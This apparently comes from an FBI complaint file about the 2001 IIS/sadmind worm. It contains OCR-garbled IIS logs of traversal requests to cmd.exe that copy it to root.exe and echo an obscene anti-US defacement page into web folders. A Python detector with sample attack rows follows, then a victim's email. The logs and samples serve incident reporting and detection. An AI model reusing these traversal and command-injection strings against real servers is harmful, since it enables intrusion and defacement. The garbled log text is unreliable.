/ctecho+’<html’>“<body+bgcolor%3 Dblack/*>“<br’>“<br’>*<br’>*<br’><br’><br’><ta 
ble+width%3D100%>*<td’>“<p+align%3D%22center%22/>"<fonttsize%3D7+color%3 Dred 
“>fuck+USA+Government*</font’>“<tr’>*<td/>"<ptalign%3D%22center%22’>"<fonttsize 
%3D7+color%3 Dred“>fuck+P oizonBOx’<tr’>*<td*>"<p+talign%3D%22center%22>"<font+s 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn</html>>../wwwroot/test/default.a 
sp 502 - 

2001-05-06 10:45:27 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-tbgcolor9?63Dblack^7^«br^^^«br^?»^«br^»^«br^2^«br^7^«br^^^«ta 
blet+width%3D100%*>*<td*>*<ptalign%3D%22center%22/><font+size%3D7+color%3Dred 
“>fuck+USA+Government*</font’><tr’>"<td/>"<ptalign%3D%22center%22’>“<fonttsize 
53D 7--color?63Dred^»fücktPoizonBOx^«tr^»^«td^»^«p-align963D9622center?622^7^« fonts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’*</himl’>>../wwwroot/test/default.h 
tm 502 - 

2001-05-06 10:45:27 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:28 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho+<html/>“<body+bgcolor%3Dblack*>*<br’>“<br’>“<br’>“<br’>“<br*>*<br’>“<ta 
ble+width%3D100%*>“<td’>"<p+align%3D%22center%22’>*<fonttsize%3 D7+color%3Dred 
“>fuck+USA+Government*</font’>“<tr’>“<td/>"<ptalign%3D%22center%22*><font+size 
%3D7+color%3Dred>fuck+P oizonBOx’<tr’>“<td/>"<ptalign%3D%22center%22°>“<fontts 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn*</html’>>../wwwroot/_borders/ind 
ex.asp 502 - 

2001-05-06 10:45:28 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body-tbgcolor9?63Dblack^7^«br^»^«br^7^«br^^«br^7^«br^7^«br^^^«ta 
blet+width%3D100%">*<td*>*<ptalign%3D%22center%22“><font+size703D7+color%3 Dred 
“>fuck+USA+Government*</font*>“<tr’>“<td’>*<p+align%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’><td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn*</html’>>../wwwroot/_borders/ind 
ex.htm 502 - 

2001-05-06 10:45:29 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«htmi^»^«body-tbgcolor?63Dblack^»^«br^»^«br^»^«br^^«br^2^«br^7^«br^»^&ta. 
blet+width%3D100%>*<td’><ptalign%3D%22center%22/><fonttsize%3D7+color%3Dred 
A>fuck+USA+Government*</font’>“<tr’>“<td’>"<ptalign%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>*<td*>*<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html“>>../wwwroot/_borders/def 
ault.asp 502 - i 

2001-05-06 10:45:29 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot*<html’>“<body+bgcolor%3Dblack*>“<br’>*<br’*>“<br*>"<br’*><br’>“<br’>“<ta 
blet+width%3D100%>“<td’>“<p+align%3D%22center%22’><font+size%3D7+color%3Dred 
A>fuck+USA+Government*</font’>“<tr’>*<td’><p+align%3D%22center%22’><font+size 
%3D7+color%3Dred*>fuck+PoizonBOx<tr’>*<td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcen@yahoo.com.cn*</html>>../wwwroot/_borders/def 
ault.htm 502 - 

2001-05-06 10:45:31 128,84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/ctcopy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:33 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


e 8 


/ctechot^«html^»^«body-tbgcolor?63Dblack^^^«br^»^«br^»^«br^?^«br^7^«br^»^«br^-^«ta 
blet+width%3D100%*>*<td’*>"<ptalign%3D%22center%22’>*<fonttsize%o3D7+color%3Dred 
“>fuck+USA+Government’</font/>"<tr’>*<td’>"<ptalign%3D%22center%22’>"<fonttsize 


: ¥%3D7+color%3Dred*>fuck+PoizonBOx’<tr’>“<td/>“<ptalign%3D%22center%22">"<fontts 


ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn’*</html*>>../wwwroot/_cusudi/inde 
x.asp 502 - 
2001-05-06 10:45:33 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho-^«btml^7^«body-tbgcolor?63Dblack^^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«ta. 
ble+width%3D100%>*<td’>"<p+align%3D%22center%22/>*<font+size%3D7+color%3Dred 
A>fuck+USA+Government’</font/>"<tr’>"<td’>*<ptalign%3D%22center%22’><font+size 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>“<td’>*<ptalign%3D%22center%22’>*<fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn’*</html“>>../wwwroot/_cusudi/inde 
x. htm 502 - 

2001-05-06 10:45:34 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echo+’<html>"<body+bgcolor%3 Dblack’>“<br’*>*<br’><br*>“<br’*><br*>*<br*>*<ta 
ble+width%3D100%>*<td’>*<ptalign%3D%22center%22/>“<font+size%3D7+color%3Dred 
^»fück--US At Government^«/font^»^«tr^»^«td^^^«p-align?63D9622center?622^7^«fonttsize 
963D7-*color?e3Dred^»fuck--PoizonBOx^«tr^7^«td^^^«p-align963D9622center?622^^^«fonts 
ize?93D4--color?63Dred^»contact:sysadmcn(a)yahoo.com.cn^«/html^77. /wwwroot/ cusudi/defa 
ult.asp 502 - 

2001-05-06 10:45:35 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechó--^«html^»^«body-tbgcolor?63Dblack^»^«br^»^«br^»^«br^7^«br^»^«br^2^«br^^«ta 
ble--width?63D10096^—^«td^7^«p-Falign?63D9/22center9622^^«fonttsize763D7--color?e3D red 
“>fuck+USA+Government</font’>*<tr’>"<td’><ptalign%3D%22center%22’><font+size 
%3D7+color%3Dred>fuck+P oizonBOx’<tr’>*<td’><ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../wwwroot/_cusudi/defa 
ult.htm 502 - 

2001-05-06 10:45:37 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/ct+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:37 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c-echo--^«html^»^«body-tbgcolor?63Dblack^^«br^»^«br^^^«br^»^«br^^«br^»^«br^2^-«ta 
ble--width?63D 1009/6^^«td^7^«p--align?e3D9622center?622^7^«fonttsize963D 7--color?03 Dred 
A>fuck+USA+Government*</font’>*<tr’>*<td’>"<ptalign%3D%22center%22/><font+size 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr>"<td’>"<p+align%3D%22center%22">"<font+s 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html>>../wwwroot/_derived/ind 
ex.asp 502 - ; 

2001-05-06 10:45:38 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho*^«hbtml^7^«body-tbgcolor?63Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^2^«br^^^«ta 
ble--width?93D 1009/9^7^«td^7^«p-Falign?e3D9/622center9622^^-fonttsize963D' 7t-color?63Dred 
“>fuck+USA+Government*</font*>*<tr’>“<td’><ptalign%3D%22center%o22*><fonttsize 
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?63D7--color?e3Dred^»fuck--PoizonBOx^«tr^»^«td^7^«p-*align?o3D9622center?022^7^-fontts 
ize?93D4--color?63Dred^»contact:sysadmcn(g)yahoo.com.cn^«/html^7. /wwwroot/ derived/ind 
ex.htm 502 - l 

2001-05-06 10:45:40 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body-tbgcolor?e3Dblack^»^«br^»^«br^»^«br^^«br^7^«br^^«br^7^«ta 
ble+width%3D100%>*<td’>*<ptalign%3D%22center%22’>"<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government’</font*>“<tr’>*<td/>"<p+talign%3D%22center%22’><font+size 
263D7-4color?63Dred^»fuck-*PoizonBOx^«tr^»^«td^»^«p-align?63D'/22center?622^7^«fontts 
ize?63D4--color?63Dred^»contact:sysadmen(g)yahoo.com.cn^«/html^7. /wwwroot/ derived/def 
ault.asp 502 - 

2001-05-06 10:45:42 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho-^«html^»^«body-"bgcolor?63Dblack^?^«br^»^«br^»^«br^»^«br^7^«br^?^«br^7^«ta 
ble+width%3D100%>"<td’>*<ptalign%3D%22center%22’>"<fonttsize%3D7+color%3Dred 
^»fück--US A--Government^«/font^^^«tr^»^«td^^^«p-align?63D9622center?622^7^-«fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx<tr>“<td’>“<ptalign%3D%22center%22"><fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../wwwroot/_derived/def 
ault.htm 502 - 

2001-05-06 10:45:42 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. ./winnt/system32/cmd.exe 
/ct+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:43 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-bgcolor?63Dblack^»^«br^^^«br^»^«br^^^«br^»^«br^»^«br^7^«ta 
blet+width%3D100%>*<td’>*<ptalign%3D%22center%22’><fonttsize%3D7+color%3Dred 
“>fuck+USA+Government*</font/>“<tr’>*<td’>"<ptalign%3D%22center%22%>"<font+tsize 
%3D7+color%3Dred*>fuck+P oizonBOx<tr’>*<td’>"<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn</html>>../wwwroot/_disc2/index 
.asp 502 - 

2001-05-06 10:45:45 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot<html’><body+bgcolor%3Dblack*>“<br’>"<br’*>*<br’>“<br’>“<br’>"<br’>*<ta 
ble+width%3D100%>“<td*><p+align%3D%22center%22><fonttsize%3D7+color%3Dred 
“>fuck+USA+Government’*</font’>“<tr’>*<td’>“<p+align%3 D%22center%22’>"<font+size 
%3D7+color%3Dred“>fuck+PoizonBOx’<tr’>*<td*>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn’</html>>../wwwroot/_disc2/index 
-btm 502 - 

2001-05-06 10:45:46 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho^«html^»^«body-bgcolor?e3Dblack^»^«br^»^«br^»^«br^»^«br^^«br^^«br^»^«ta 
ble+width%3D100%>*<td*>"<ptalign%3D%22center%22’>"<font+size/3D7+color%3Dred 
A>fuck+USA+Government’*</font’>*<tr’>*<td’>"<ptalign%3D%22center%22’>"<font+size 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>*<td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn</html“>>../wwwroot/_disc2/defau 
It.asp 502 - 


o 


2001-05-06 10:45:49 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/cecho-t-^«html^^^«body-bgcolor?e3Dblack^2^«br^?^«br^7^«br^»^«br^^«br^7^«br^»^«ta 
bletwidth%3D100%>*<td’*>“<p+align%3D%22center%22’>"<fonttsize/%03D7+color%3 Dred 
A>fuck+USA+Government</font’><tr’>"<td’>"<ptalign%3D%22center%22“>"<fonttsize 
263D7--color?e3Dred^»fücktPoizonBOx^«tr^^^«td^7^«p-align?63D9622center9622^7^«fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn’</html>>../wwwroot/_disc2/defau 
It.htm 502 - 

2001-05-06 10:45:50 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. /winnt/system32/cmd.exe 
/ct+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:53 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


[ckechot^chtml^»^cbody bgcolor/ó3Dblack^r»^cbr^»^«br^»^«br^»^cbr^»^ cbr^» ^ cbr^» ^ta 
ble+width%3D 100%*>*<td’>*<p+align%3D%22center%22">"<font+size%3D7+color%3 Dred 
“>fuck+USA+Government®</font*>“<tr’>“<id’>"<ptalign%3 D%22center%22’><fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>“<td’>"<ptalign%3D%22center%22/>"<fontts 
_ize%3D4+color%3Dred”>contact:sysadmen@yahoo.com.cn*</html>>../wwwroot/_fpclass/ind 
ex.asp 502 - 

2001-05-06 10:45:54 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot<html/>*<bodyt+bgcolor%3 Dblack*>“<br*>“<br*>*<br’><br*>*<br*><br’>"<ta 
bletwidth%3D100%>*<td’>"<p+align%3D%22center%22’><font+size%3D7+color%3Dred 
“>fuck+USA+Government’</font*>“<tr’>*<td’><ptalign%3D%22center%22’>"<fontt size 
%3D7+color%3Dred’>fuck+PoizonBOx<tr’>*<td’>"<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html“>>../wwwroot/_fpclass/ind 
ex. htm 502 - 

2001-05-06 10:45:54 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho+“<html“>*<bodyt+bgcolor%3Dblack’*>“<br’>“<br’>“<br’>“<br’><br’>“<br’>"<ta 
ble+width%3D100%*>*<td’>“<p+align%3D%22center%22”>"<font+size%3D7+color%3Dred 
^»fückt US A--Government^«/font^^^«tr^»^«td^^^«p-align?63D9622center?022^7^«fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx”<tr’>*<td’>"<ptalign%3D%22center%22">"<font+s 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn</html’>>../wwwroot/_fpclass/def 
ault.asp 502 - 

2001-05-06 10:45:56 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body-bgcolor?e3Dblack^^^«br^7^«br^»^«br^^«br^»^«br^»^«br^7^«ta 
ble-Fwidth?/63D 1009 6^7^«td^7^«p-Falign?63D9622center?622^7^-fonttsize903D 7--color?03Dred 
“>fuck+USA+Government*</font’>“<tr’>“<td’>"<ptalign%3D%22center%22°><fonttsize 
%3D7+color%3Dred’>fuck+PoizonBOx<tr’>“<td’>"<ptalign%3D%22center%22/><fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’*</html>>../wwwroot/_fpclass/def 
ault.htm 502 - 

2001-05-06 10:45:57 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. ./winnt/system32/cmd.exe 
/c+copyt+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:45:59 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


l e 


/ctecho-^«html^»^«body--bgcolor?e3Dblack^?^«br^»^«br^»^«br^^«br^»^«br^»^«br^?^«ta. 
blet+width%3D100%*>*<td’>*<ptalign%3D%22center%22/>"<fontt+size%3D7+color%3Dred 
“>fuck+USA+Government’*</font’>“<tr’>"<td*><ptalign%3D%22center%22’>"<font+size 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr’>*<td’>“<ptalign%3 D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.ca*</html>>../wwwroot/_private/ind 
ex.asp 502 - 

2001-05-06 10:45:59 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-bgcolor?e3Dblack^?^«br^7^«br^»^«br^-^«br^»^«br^?^«br^7^-«ta 
ble+width%3D100%"><td/><ptalign%3D%22center%22>"<font+size%3D7+color%3Dred 
A>fuck+USA+Government’*</font*>“<tr’>"<td’>"<ptalign%3D%22center%22">"<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx”<tr’><td’>"<p+align/%3D%22center%o22">"<fontts 
ize%3D4+color%3Dred“>contact:sysadmcen@yahoo.com.cn</html>>../wwwroot/_private/ind 
ex.htm 502 - 

2001-05-06 10:46:00 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot<html/>“<bodytbgcolor%3Dblack/*>“<br’>“<br*>“<br’>"<br’><br’*>"<br’><ta 
ble+width%3D100%>*<td’>*<ptalign%3D%22center%22’><fonttsize%3D7+color%3Dred 
A>fuck+USA+Government’*</font/>*<tr’>"<td/>*<ptalign%3D%22center%22/>"<fontt size 
963D7--color?63Dred^»fuck--PoizonBOx^«tr^^^«td^^^«p-talign?63 D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html>>../wwwroot/_private/def 
ault.asp 502 - : 

2001-05-06 10:46:02 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body--bgcolor?63Dblack^?^«br^»^«br^»^«br^^«br^»^«br^»^«br^?^«ta 
ble+width%3D100%>*<td’>"<ptalign%3D%22center%22’><fonttsize%3D7+color%3Dred 
“>fuck+USA+Government’*</font/>“<tr’>*<td’>“<ptalign%3D%22center%22’><fonttsize 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr’>*<td’><ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn</html>>../wwwroot/_private/def 
ault.htm 502 - 

2001-05-06 10:46:02 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:46:04 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body--bgcolor?e3Dblack^?^«br^»^«br^»^«br^^«br^»^«br^»^«br^»^«ta 
ble+width%3D100%*><td*>“<ptalign%3D%22center%22’><font+size%o3D7+color%3Dred 
A>fuck+USA+Government’</font’>*<tr’>”*<td’/>"<ptalign%3D%22center%22’>“<fontt size 
%3D7+color%3Dred*>fuck+PoizonBOx’<tr’>*<td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’</html>>../wwwroot/_themes/ind 
ex.asp 502 - 

2001-05-06 10:46:04 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


[ctecho--^«html^»^«body-"bgcolor?e3Dblack^»^«br^»^«br^»^«br^»^«br^7^«br^»^«br^-^-ta 
ble--width963D10096^—^«td^7^«p-align?43D9/622center9622^7^-fonttsize?63D 7--color?63Dred 


e 


^»fück--USAtGovernment^«/font^»^«tr^»^«td^»^«p-align?63D9/22center9622^^^«font size 
963D7-color?63Dred^fuck--PoizonBOx^«tr^»^«td^^^«p-align?63D7622cente19622^»^«fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’</html’>>../wwwroot/_themes/ind 
ex.htm 502 - 

2001-05-06 10:46:06 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echo+*<html’>*<body+bgcolor%3Dblack’>“<br’*>*<br’*><br*>*<br’>*<br’>“<br’>*<ta 
ble+width%3D100%*>*<td’>“<ptalign%3D%22center%22"><font+size%3D7+color%3 Dred 
“>fuck+USA+Government’</font’*>“<tr’>“<td’><ptalign%3D%22center%224>"<font+size 
%3D7+color%3Dred*>fuck+P oizonBOx’<tr’>“<td“>"<p+align%3D%22center%22"><fontts 
ize%3D4+color%3Dred’>contact:sysadmcen@yahoo.com.cn’</html’>>../wwwroot/_themes/def 
ault.asp 502 - 

2001-05-06 10:46:07 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot*<html/>“<body+bgcolor%3 Dblack’*>“<br’>*<br*>“<br’>*<br*><br*>"<br’**<ta 
ble+width%3D100%>“<td’><ptalign%3D%22center%22’>"<font+size%3D7+color%3 Dred 
“>fuck+USA+Government*</font*>“<tr’>“<td’><ptalign%3D%22center%224>"<font+size 
%3D7+color%3Dred*>fick+P oizonBOx’<tr’>“<td’>*<ptalign%3 D/%22center%22’><fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html’>>../wwwroot/_themes/def 
ault.htm 502 - 

2001-05-06 10:46:09 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. /winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:46:11 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot“<html/>“<body+bgcolor%3 Dblack*><br’*>“<br’>“<br’>“<br’>“*<br’*>"<br’>*<ta 
ble+width%3D100%*>*<td*>"<p+align%3D%22center%22’><fonttsize%3D7+color%3 Dred 
“>fuck+USA+Government*</font’>“<tr>*<td’>"<p+align%3D%22center%22"><font+size 
%3D7+color%3Dred’>fuck+P oizonBOx"<tr’>“<td’>"<ptalign%3D%22center%22“>“<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn</html>>../wwwroot/_vti_log/ind 
ex.asp 502 - 

2001-05-06 10:46:11 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body-bgcolor?o3Dblack^»^«br^»^«br^»^«br^7^«br^»^«br^»^«br^7^-ta 
ble--width?63D10096^7^«td^7^«p-talign?63D9622center?622^7^«font-size?63D7--color?63Dred 
^»fück "USA: Government^«/font^^^«tr^»^«td^^^«p-ralign?63D9622center?e22^7^-fonttsize 
%3D7+color%3Dred’*>fuck+P oizonBOx’<tr’>“<td’>"<ptalign/%3D%22center%22”>“<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html”>>../wwwroot/_vti_log/ind 
ex.htm 502 - 

2001-05-06 10:46:12 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body-bgcolor?63Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^7^«br^7^«ta 
blet+width%3D100%><td’>*<ptalign%3D%22center%22’><font+size%3D7+color%3Dred 
“>fuck+USA+Government</font’>“<tr’>“<td’>*<p+align”%3D%22center%22">*<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>“<td4>*<ptalign%3 D%22center%22’><fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn”*</html>>../wwwroot/_vti_log/def 


l e 


ault.asp 502 - 
2001-05-06 10:46:12 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^7^«body-tbgcolor?63 Dblack^»^«br^»^«br^»^«br^^«br^»^«br^2^«br^7^«ta 
bletwidth?63D10096^—^«td^7^«p-align?03D9422center9022^7^«fonttsize?03D 74-color?63 Dred 
“>fuck+USA+Government’</font*>“<tr’>“<td’>"<p+talign%3D%022center%22/><font+size 
%3D7+color%3Dred’>fuck+PoizonBOx”<tr*>"<td’>"<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’*</html“>>../wwwroot/_vti_log/def 
ault.htm 502 - 

2001-05-06 10:46:17 128.84.234.79 - 24.9.173.59 80 GET /Default htm - 200 - 
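The log above shows the whole worm cycle in a few dozen rows: a traversal request to cmd.exe that copies the shell to root.exe under /scripts, then one root.exe request per target file that echoes the defacement page out to the web root. As an added example (not part of the FBI report or of any victim's submission), the Python below turns those three behaviours into detection logic over IIS W3C extended log rows. It assumes the column layout of the excerpt above when a log carries no #Fields header, honours a #Fields line when one is present (the abbreviated layout in the complainant's email later on the page), and runs on constructed sample rows that use documentation IP ranges rather than the addresses in the report.

```python
"""Flag sadmind/IIS-worm style requests in IIS W3C extended log lines.

Added example, not code from the FBI report: the three behaviours visible in
the logs (traversal to cmd.exe, use of a dropped root.exe shell, echo-redirect
defacement writes) expressed as detection logic over parsed log rows.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote, unquote_plus

# Column order assumed when a log carries no "#Fields:" header.  This is an
# assumption matching the layout of the excerpt above, not a header from it.
DEFAULT_FIELDS = ["date", "time", "c-ip", "cs-username", "s-ip", "s-port",
                  "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status",
                  "cs(User-Agent)"]

# "dot-dot" traversal in raw or decoded form; %c0%af and %c1%9c are the
# overlong UTF-8 slashes the IIS folder-traversal bug accepted, and they only
# survive in the raw stem, so both forms are checked.
TRAVERSAL = re.compile(r"\.\.[/\\]|%2e%2e|%c0%af|%c1%9c", re.IGNORECASE)
CMD_SHELL = re.compile(r"/cmd\.exe$", re.IGNORECASE)
ROOT_EXE = re.compile(r"/root\.exe$", re.IGNORECASE)


@dataclass(frozen=True)
class Hit:
    time: str
    client: str
    kind: str    # "traversal-shell", "dropped-shell" or "defacement"
    target: str  # URI stem attacked, or the file an echo redirect wrote


def parse_w3c(text, default_fields=DEFAULT_FIELDS):
    """Yield one dict per log row, taking column names from any #Fields line."""
    fields = list(default_fields)
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        # zip() tolerates rows shorter than the header (trailing "-" dropped).
        yield dict(zip(fields, line.split()))


def classify(row):
    """Return a Hit when the row matches worm behaviour, else None."""
    stem = row.get("cs-uri-stem", "")
    decoded = unquote(stem)
    query = unquote_plus(row.get("cs-uri-query", "-"))  # "+" is a space here
    when, client = row.get("time", ""), row.get("c-ip", "")
    if CMD_SHELL.search(decoded) and (TRAVERSAL.search(stem) or TRAVERSAL.search(decoded)):
        return Hit(when, client, "traversal-shell", decoded)
    if ROOT_EXE.search(decoded):
        if "echo" in query.lower() and ">" in query:
            # "/c echo <html>...</html>>../wwwroot/x.asp": the text after the
            # last ">" is the file the redirect wrote, i.e. the defaced page.
            return Hit(when, client, "defacement", query.rsplit(">", 1)[1].strip())
        return Hit(when, client, "dropped-shell", decoded)
    return None


def scan(text, default_fields=DEFAULT_FIELDS):
    """Run classify() over every row; returns the Hits in log order."""
    return [h for h in (classify(r) for r in parse_w3c(text, default_fields)) if h]


def summarize(hits):
    """Counts per kind, the files a defacement wrote, and the source hosts."""
    counts = {}
    for h in hits:
        counts[h.kind] = counts.get(h.kind, 0) + 1
    return {"counts": counts,
            "defaced_files": sorted({h.target for h in hits if h.kind == "defacement"}),
            "clients": sorted({h.client for h in hits})}


# Constructed sample rows modelled on the excerpt above.  192.0.2.0/24,
# 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges, not the
# addresses in the report; the page body is shortened to keep the lines short.
DEFACE = ("/c+echo+<html><body+bgcolor%3Dblack><table+width%3D100%><td>"
          "<p+align%3D%22center%22><font+size%3D7+color%3Dred>defaced</font></html>")
SAMPLE_FULL = f"""
2001-05-06 10:44:50 192.0.2.10 - 198.51.100.5 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\\winnt\\system32\\cmd.exe+root.exe 502 -
2001-05-06 10:44:51 192.0.2.10 - 198.51.100.5 80 GET /scripts/root.exe {DEFACE}>../wwwroot/images/index.asp 502 -
2001-05-06 10:44:53 192.0.2.10 - 198.51.100.5 80 GET /scripts/root.exe {DEFACE}>../wwwroot/images/index.htm 502 -
2001-05-06 10:44:55 192.0.2.10 - 198.51.100.5 80 GET /scripts/root.exe {DEFACE}>../wwwroot/images/index.asp 502 -
2001-05-06 10:46:17 192.0.2.10 - 198.51.100.5 80 GET /Default.htm - 200 -
2001-05-06 10:50:00 203.0.113.7 - 198.51.100.5 80 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe /c+dir 200 -
2001-05-06 11:00:00 198.51.100.20 - 198.51.100.5 80 GET /index.asp - 200 Mozilla/4.0
"""
# Same events in the abbreviated layout of the complainant's log (constructed).
SAMPLE_SHORT = """#Fields: time c-ip cs-method cs-uri-stem sc-status
22:35:09 192.0.2.10 GET /scripts/../../winnt/system32/cmd.exe 502
22:35:13 192.0.2.10 GET /scripts/root.exe 502
22:35:14 192.0.2.10 GET /scripts/root.exe 502
"""

if __name__ == "__main__":
    for sample in (SAMPLE_FULL, SAMPLE_SHORT):
        for hit in scan(sample):
            print(hit)
        print(summarize(scan(sample)))
```

The 502 status on every worm row is worth keeping in mind when tuning this: IIS returned 502 because cmd.exe produced no HTTP headers, so a status filter of "only 200s" would hide exactly the rows that matter, and the detection keys on the request, not the response.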


Other Pertinent Information:
HHcube Software Technologies, L.L.C.
4822 South Nancy Drive

computer hacking
1 of 2

Subject: computer hacking
Date: Wed, 9 Ma


b7C 


Hello,

Just the other day, I put my web site online using windows 2000 pro, and got hacked. Here is what I can deduce happened. I was running with all critical updates before March 15, 2001.


In my log file, the following was found

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-05-07 22:35:09
#Fields: time c-ip cs-method cs-uri-stem sc-status
22:35:09 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe
22:35:11 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe
22:35:13 210.28.192.2 GET /scripts/root.exe 502
